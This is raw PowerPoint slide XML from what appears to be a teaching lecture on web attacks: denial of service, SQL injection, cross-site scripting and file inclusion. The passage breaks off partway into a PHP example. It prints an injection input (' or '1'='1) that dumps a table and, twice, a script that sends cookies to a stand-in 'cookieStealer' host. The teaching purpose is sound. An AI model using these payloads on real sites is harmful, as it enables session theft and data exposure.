            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The attacker hopes to overwhelm the content provider’s resources with requests for service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Sometimes the attacker issues requests through a “bot army” of compromised or rented machines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>The attacker looks for “amplification” where an easy-to-generate request requires a large or difficult-to-generate response.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138111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Attacks “Scrubbed” by Akamai</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704850" y="1785771"/>
            <a:ext cx="8287846" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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SQL injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>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Cross-site scripting (XSS) attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>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File inclusion attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cache busting attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3383353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Query Language (SQL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="http://support.sas.com/documentation/cdl/en/sqlproc/63043/HTML/default/images/proc-sql-ex3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6902"/>
            <a:ext cx="5815388" cy="28535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399" y="4265713"/>
            <a:ext cx="13601701" cy="2492990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Query:</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SELECT * FROM Employees WHERE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 ’PARKER’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IdNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JobCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     Salary     Phone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1354     PARKER      MARY     FA3         65800      914/455-2337</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6654800" y="2442805"/>
            <a:ext cx="5677541" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(image from http://support.sas.com)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374597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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533395" y="1446018"/>
            <a:ext cx="12611101" cy="6494085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Suppose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is a variable holding a value provided by an end-user through a form on a Web page, and the application server performs the query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34"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SELECT * FROM Employees WHERE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 ’” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> + ”’;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>But what if instead of entering a name like PARKER the user enters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34"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 or ’1’=’1</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Then the query becomes</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latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM Employees WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = ’’ or ’1’=’1’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This query returns all rows in the Employees table!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12642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bobby-tables.com: A guide to preventing SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="xkcd Bobby Table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4" y="1825625"/>
            <a:ext cx="12388169" cy="3813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4225" y="6515100"/>
            <a:ext cx="4095993"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(from the comic strip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xkcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2959272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Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker types this into text entry form:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker hopes that the site will insert this into HTML that it later outputs, and then the victim’s browser will execute the script.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2954904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XSS: Basic Cookie Stealing </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1645921"/>
            <a:ext cx="13167360" cy="1701515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="137161" y="2991835"/>
            <a:ext cx="14493240" cy="4435322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2716269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Inclusion Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="2087880"/>
            <a:ext cx="13167360" cy="3665220"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> method="get"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name="COLOR"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value="red"&gt;red&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value="blue"&gt;blue&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> type="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850900" y="6997700"/>
            <a:ext cx="3911648"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(Example from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>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3750" b="87205"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4076747" y="5276850"/>
            <a:ext cx="6344879" cy="166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68818" y="1449228"/>
            <a:ext cx="3207929"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User selects a color:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3717030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Inclusion Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="807720" y="1840230"/>
            <a:ext cx="13167360" cy="2903220"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>   if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
